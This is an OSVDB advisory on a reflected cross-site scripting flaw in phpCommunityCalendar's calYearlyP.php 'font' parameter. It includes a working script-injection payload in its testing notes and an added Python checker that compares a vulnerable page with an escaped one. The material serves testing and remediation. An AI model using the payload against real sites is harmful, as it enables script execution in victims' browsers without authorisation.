phpCommunityCalendar calYearlyP.php font Variable XSS

2005-09-05T15:24:47
ID OSVDB:19367
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-09-05T15:24:47

Description

Vulnerability Description

phpCommunityCalendar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate or encode the 'font' variable upon submission to the 'calYearlyP.php' script before echoing it back in the generated page. This could allow a user to create a specially crafted URL that would execute arbitrary script in a victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"

The payload is shaped to break out of a double-quoted attribute: the leading "> closes the attribute and tag the value is reflected into, the script element is injected, and the trailing <" re-opens a quote so the rest of the original markup is swallowed. The payload is shown unencoded; when sending it from a browser or proxy, URL-encode the quotes and angle brackets. A vulnerable response contains the <script> element verbatim; a fixed one reflects it as &lt;script&gt; (or not at all).
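The following is an added example, not part of the OSVDB record or of phpCommunityCalendar's code. It models the flaw in the Vulnerability Description and the payload in the Manual Testing Notes: it assumes (hypothetically) that calYearlyP.php echoes the 'font' value into a double-quoted attribute of a <font> tag, which is what the "><...><" shape of the payload is built to escape. The two renderers stand in for the vulnerable page and a hardened one, and the checker tells the two apart by parsing the response rather than by plain string matching, so an entity-encoded echo is not mistaken for a live script element. No real host is contacted.

```python
"""Reflected XSS check for a query parameter echoed into an HTML attribute.

Added example (assumptions): the 'font' parameter is assumed to land inside
a double-quoted attribute; the hostname and path below are placeholders.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode, urlsplit, parse_qs

# Payload taken from the advisory's Manual Testing Notes.
PAYLOAD = '"><script>alert(\'LOL\')</script><"'


def build_test_url(base: str, param: str = "font", payload: str = PAYLOAD) -> str:
    """Return base?param=<url-encoded payload>.

    urlencode() percent-encodes the quotes, angle brackets and parentheses,
    which browsers and proxies would otherwise mangle or reject.
    """
    return f"{base}?{urlencode({param: payload})}"


def render_vulnerable(font: str) -> str:
    """Model of the unvalidated echo (hypothetical template): raw value in an attribute."""
    return f'<font face="{font}">calendar</font>'


def render_hardened(font: str) -> str:
    """Same template, value entity-encoded for the attribute context.

    escape(..., quote=True) encodes & < > " and ', i.e. the same set PHP's
    htmlspecialchars() covers with ENT_QUOTES, so the value cannot close the
    attribute or start a tag.
    """
    return f'<font face="{escape(font, quote=True)}">calendar</font>'


def simulate(renderer, url: str) -> str:
    """Stand-in for an HTTP request: pull 'font' from the URL, pass it to the page."""
    font = parse_qs(urlsplit(url).query).get("font", [""])[0]
    return renderer(font)


class _ScriptFinder(HTMLParser):
    """Records whether a <script> element whose body contains `needle` is parsed."""

    def __init__(self, needle: str):
        super().__init__()
        self.needle = needle
        self.in_script = False
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as raw text.
        if self.in_script and self.needle in data:
            self.found = True


def payload_executes(body: str, needle: str = "alert('LOL')") -> bool:
    """True if the response, parsed as HTML, contains a real <script> element
    carrying the marker. An escaped echo (&lt;script&gt;...) yields False
    because the parser never sees a script start tag."""
    finder = _ScriptFinder(needle)
    finder.feed(body)
    finder.close()
    return finder.found


if __name__ == "__main__":
    url = build_test_url("http://target.example/calendar/calYearlyP.php")
    print(url)
    print("vulnerable page executes payload:", payload_executes(simulate(render_vulnerable, url)))
    print("hardened page executes payload:  ", payload_executes(simulate(render_hardened, url)))
```

To use this against a live instance, replace simulate() with an HTTP fetch of build_test_url(...) and feed the response body to payload_executes(); the parser-based check is what keeps a server that merely reflects the string in encoded form from being reported as vulnerable.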

References:

Vendor URL: http://open.appideas.com/Calendar/
Secunia Advisory ID: 16721
Related OSVDB ID: 19359
Related OSVDB ID: 19366
Related OSVDB ID: 19353
Related OSVDB ID: 19357
Related OSVDB ID: 19358
Related OSVDB ID: 19361
Related OSVDB ID: 19364
Related OSVDB ID: 19354
Related OSVDB ID: 19355
Related OSVDB ID: 19356
Related OSVDB ID: 19360
Related OSVDB ID: 19362
Other Advisory URL: http://www.rgod.altervista.org/phpccal.html
Nessus Plugin ID: 19595
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0057.html
ISS X-Force ID: 22176
CVE ID: CVE-2005-2882